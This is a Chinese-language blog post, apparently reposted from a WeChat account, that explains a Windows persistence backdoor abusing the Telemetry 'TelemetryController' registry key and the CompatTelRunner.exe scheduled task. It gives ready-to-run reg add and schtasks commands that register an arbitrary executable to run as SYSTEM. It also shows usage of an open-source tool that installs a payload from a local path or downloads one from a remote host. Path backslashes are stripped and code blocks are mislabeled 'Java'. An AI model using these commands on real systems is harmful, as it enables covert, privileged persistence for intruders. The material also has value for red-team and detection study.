windows持久化后门之遥测诊断技术

Windows Telemetry 介绍

Windows Telemetry（Windows遥测）是指Microsoft Windows操作系统中的一种数据收集和传输机制，用于收集有关系统和应用程序的使用情况、性能数据以及其他诊断信息。该机制旨在帮助Microsoft更好地理解和改进Windows操作系统的性能、稳定性和用户体验。

Windows遥测通常包括以下几个方面：

• 使用数据：收集关于用户如何使用操作系统和内置应用程序的数据。这可能包括使用频率、功能使用情况、设置配置等信息。

• 性能数据：收集关于系统性能的数据，例如启动时间、应用程序响应时间、资源利用率等。这些数据有助于评估和改进系统的整体性能。

• 错误报告：收集有关系统和应用程序发生错误或崩溃的信息。这些错误报告对于Microsoft修复软件中的漏洞和改进系统的稳定性非常有帮助。

• 配置信息：收集关于操作系统配置、硬件配置和其他相关设置的信息。这有助于Microsoft了解不同硬件和软件环境中的系统行为。

Windows遥测的目的是通过分析这些数据来改进Windows操作系统，提高用户体验，并提供更好的性能和稳定性。

如何实现windows telemetry

CompatTelRunner.exe 是Windows操作系统中的一个进程，主要与兼容性和更新相关的任务有关，该二进制可执行程序存储在以下位置：

Java                   C:WindowsSystem32

以下是一些与 CompatTelRunner.exe 相关的重要信息：    

• 任务：CompatTelRunner.exe 的主要任务之一是收集和发送关于计算机硬件和软件兼容性的信息给Microsoft。这有助于Microsoft了解用户环境中可能存在的问题，以便改进和更新Windows系统。

• 兼容性数据收集：该进程负责在系统上运行一些兼容性扫描，并收集有关硬件、驱动程序、应用程序和系统设置的信息。这些信息可以用于判断计算机是否适合升级到新的Windows版本，或者是否可能遇到兼容性问题。

• Windows更新：CompatTelRunner.exe 还涉及到Windows更新的一些任务。它可能会检查系统的更新状态，帮助确保系统处于最新的安全和兼容性状态。

• 定时运行：CompatTelRunner.exe 通常在系统处于空闲状态时运行，以避免影响用户体验。它可能以计划任务的形式在后台运行。

• 资源占用：有时，用户可能会注意到 CompatTelRunner.exe 进程在后台运行时占用了一定的系统资源，尤其是在某些情况下可能会导致CPU使用率增加。

因此我们可以使用CompatTelRunner 执行从特定注册表项检索的各种命令来实现持久性后门

持久化利用思路

持久化思路步骤如下：

1. 在注册表“ TelemetryController ”项下创建注册表子项

2. 创建将执行任意命令后门写入到“ Command ”键值

3. 创建“ DWORD ”键值设置为 Nightly，数据值设置为“1”

4. 通过 schtasks 二进制文件执行“ Microsoft Compatibility Appraiser ”计划任务 （Microsoft Compatibility Appraiser 是 Windows 操作系统中的一个组件，它与兼容性扫描和计算机硬件、驱动程序、应用程序等方面的信息收集有关。这个组件通常与 CompatTelRunner.exe 进程一起工作，共同完成兼容性分析的任务）

上述思路可以通过以下命令来实现：

Java                   reg add HKLMSOFTWAREMicrosoftWindows NTCurrentVersionAppCompatFlagsTelemetryControllerPersistence                   reg add "HKLMSoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagsTelemetryControllerPersistence" /v Command /t REG_SZ /d "C:UsersPeterDownloadsdemon.x64.exe"                   reg add "HKLMSoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagsTelemetryControllerPersistence" /v Nightly /t REG_DWORD /d 1                   schtasks /run /tn "MicrosoftWindowsApplication ExperienceMicrosoft Compatibility Appraiser"

执行上述命令将导致注册表发生以下修改，如下所示：

可以通过提权来实现windows Telemetry建立持久化后门

Telemetry恶意脚本利用

根据上述利用思路，github上有个大佬写了一个针对性的利用脚本，可以下载下来直接使用；Telemetry是一个开源利用此类持久化后门技术的恶意程序，开源地址为https://github.com/Imanfeng/Telemetry，

它通过攻击方能够使用本地路径来运行任意负载来实现持久性方法

Java                   telemetry.exe install /path:C:UserspeterDownloadsdemon.x64.exe

也可以从远程链接下载到磁盘执行

Java                   telemetry.exe install /url:http://10.0.0.3:9000/demon.x64.exe

执行后，该工具将创建所需的注册表结构，如下图所示：

   

植入后门程序将在“ CompatTelRunner.exe ”进程的上下文中执行

而CompatTelRunner.exe默认会以计划任务 system权限运行，因此此时植入的后门程序也会以system权限执行

补充信息

Microsoft Compatibility Appraiser、Windows Telemetry 和 CompatTelRunner.exe 在 Windows 操作系统中都与兼容性、数据收集以及系统性能有关，但它们各自有不同的任务和功能。以下是它们之间的关系：

Microsoft Compatibility Appraiser:

• 任务：主要用于扫描系统的硬件、软件、驱动程序等兼容性信息，并生成关于系统状态的兼容性报告。

• 兼容性评估：通过分析系统的配置和安装的应用程序，Microsoft Compatibility Appraiser 可以提供关于是否可以顺利升级到新版本 Windows 或者安装特定更新的信息。

• 任务计划：在系统中以任务计划的形式运行，通常与 CompatTelRunner.exe 相关联。

Windows Telemetry:

• 任务：主要用于收集关于操作系统的使用情况、性能数据、错误报告等信息，以帮助 Microsoft 了解和改进 Windows 操作系统。

• 数据类型：包括用户的操作习惯、系统性能数据、错误和崩溃报告等。    

• 遥测收集：Windows Telemetry 提供了关于系统性能和用户体验的数据，而这些数据可能包括 Microsoft Compatibility Appraiser 收集的兼容性信息。

CompatTelRunner.exe:

• 任务：主要负责在后台运行，执行兼容性评估和数据收集任务。

• 关联组件：CompatTelRunner.exe 与 Microsoft Compatibility Appraiser 相关联，它实际上是运行 Microsoft Compatibility Appraiser 的进程。

• 系统检查：在系统空闲时，CompatTelRunner.exe 可能会运行，执行与系统兼容性相关的扫描，并将数据传递给 Windows Telemetry 进行分析。

综合来看，这三者的关系是，Microsoft Compatibility Appraiser 是负责扫描和生成兼容性报告的组件，它可能由 CompatTelRunner.exe 触发，而 Windows Telemetry 则是用于收集广泛的操作系统使用和性能数据的机制。这些组件共同帮助 Microsoft 更好地了解用户的系统，提供更好的服务、改进系统性能，并为用户提供更好的体验。    

原文始发于微信公众号（暴暴的皮卡丘）：windows持久化后门之遥测诊断技术